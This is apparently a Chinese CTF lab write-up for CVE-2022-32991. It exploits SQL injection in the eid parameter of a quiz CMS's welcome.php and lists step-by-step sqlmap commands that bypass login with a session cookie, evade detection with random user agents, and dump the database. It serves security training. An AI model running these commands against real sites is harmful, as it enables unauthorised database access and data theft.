春秋云境 CVE-2022-32991

最新推荐文章于 2023-08-16 16:26:09 发布
最新推荐文章于 2023-08-16 16:26:09 发布
阅读量268 收藏
点赞数
分类专栏: 春秋云境 文章标签: web安全 阿里云 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44640313/article/details/130663753
版权

参考博客:【春秋云境】CVE-2022-32991靶场wp-CSDN博客

一开始题目就提示了该CMS的welcome.php中存在SQL注入攻击

打开环境,直接尝试进入welcome.php,发现跳转到了login.php,那我们还是注册登录看看

 注册、登录后才看到就在welcome.php页面下

在阿里云漏洞库(阿里云漏洞库)里可以看到漏洞的具体实现参数是eid

随便点击了第一个star就发现了eid参数

 

 来抓包搞一下,保存成1.txt直接用sqlmap一把梭

先查数据库名

sqlmap -r 1.txt --dbs --batch --random-agent -p eid

--user-agent可采用--random-agent

这里参考大佬的说明:由于该页面采用了登录访问,所以首先想到要使用–cookie参数使得sqlmap绕过身份验证,并添加–user-agent参数或--random-agent使得sqlmap绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断。

不抓包保存成文档也可以这种语句:
sqlmap -u "http://eci-2ze7w48823u3nvrxmne4.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --random-agent --cookie="PHPSESSID=cl3ho5qn9f68jr8eias8j0ktai" --batch --dbs

看到有个ctf的库,继续爆表(打着打着环境没了,还以为语句错了搞了好久,,提醒大家一定注意下环境时间)

sqlmap -r 1.txt --random-agent -p eid -D "ctf" --tables --batch

 

可以看到一个flag的表,进去看看

sqlmap -r 1.txt --random-agent -p eid -D "ctf" -T "flag" --columns --batch

看到有个flag的字段,直接获取里面的内容,得到flag

sqlmap -r 1.txt --random-agent -p eid -D "ctf" -T "flag" -C "flag" --dump --batch

 

0e1G7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
PHP程序提示sql注入漏洞的处理方法
wwwwestcn的博客
04-23 642
如果想整站防注,就在网站的一个公用文件,如数据库链接文件config.inc.php!添加require_once('360_safe3.php');1.解压后将360_safe3.php传到要包含的文件的目录。a).在所需要防护的页面加入代码。就可以做到页面防注入、跨站。常用php系统添加文件。
phpcms 存在SQL注入CVE-2022-26613)
weixin_68999845的博客
08-16 1201
1.下载源码到本地:https://codeload.github.com/harshitbansal373/PHP-CMS/zip/refs/heads/master。PHPCMS v1.0 版本存在安全漏洞,该漏洞源于 categorymenu.php 的 category 参数。源码下载url:https://github.com/harshitbansal373/PHP-CMS。参数$query后跟随sql语句,接收参数category,未做任何处理,存在sql注入,无需绕过。
CVE-2022-32991
qq_63928796的博客
10-11 3088
发现可能存在sql注入漏洞,进而查看一下源码,mysqli_query没有任何的过滤。进去漏洞页面后正常注册登录,发现了p参数和welcome.php界面。该CMSwelcome.php存在SQL注入攻击。保存成1.txt用sqlmap梭一下。用Seay源码审计一下。
【某CMS漏洞分析】SQL注入漏洞分析
bdfcfff77fa的博客
03-07 471
这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值,
i春秋云境.com【1-3】
qq_58091216的博客
03-06 619
i春秋云境.com
春秋云境:CVE-2022-32991SQL注入
m0_65712192的博客
04-12 1563
CMSwelcome.php存在SQL注入攻击
春秋云镜 CVE-2022-32991
qq_22002773的博客
06-21 327
CVE-2022-32991
春秋云镜cve-2022-32991wp
CS160126的博客
06-27 547
春秋云镜cve-2022-32991
春秋云境CVE-2022-32991靶场wp
热门推荐
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com
php168sql注入漏洞
08-15
php168某版本存在sql注入,可通过该漏洞获取数据库信息
春秋云境 CVE-2022-4230 夺旗
最新发布
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
春秋云境CVE-2022-32991
ZXW_NUDT的博客
02-22 2502
春秋云境CVE-2022-32991
春秋云镜 CVE-2022-32991 Web Based Quiz System v1.0 [超详细新手教程]
starttv的博客
10-26 731
Web Based Quiz System v1.0 通过welcome.php 的eid 参数被发现包含一个SQL 注入漏洞。
[春秋云镜] CVE-2022-32991 靶场详解
weixin_60374959的博客
11-23 2097
本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。-p 指定注入的参数--batch 使用默认方法去执行sql注入--random-agent 随机更换请求头--user-agent 使用指定的请求头--cookie 使用指定cookie。
春秋云镜.com 免费空间系列(1) CVE-2022-32991
陈学卫的博客
07-27 307
今天看到一个很好的在线靶场平台地址春秋云镜.com,里边有很多的免费的cve漏洞,从今天起,将更新一个春秋云镜免费空间系列,一个一个攻克cve的漏洞自此,迈出了攻防小白的第一步。这个主要考用户的sqlmap的一些命令和用法,熟练掌握sqlmap是我们成长的第一步。
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其包含了与该漏洞相关的利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值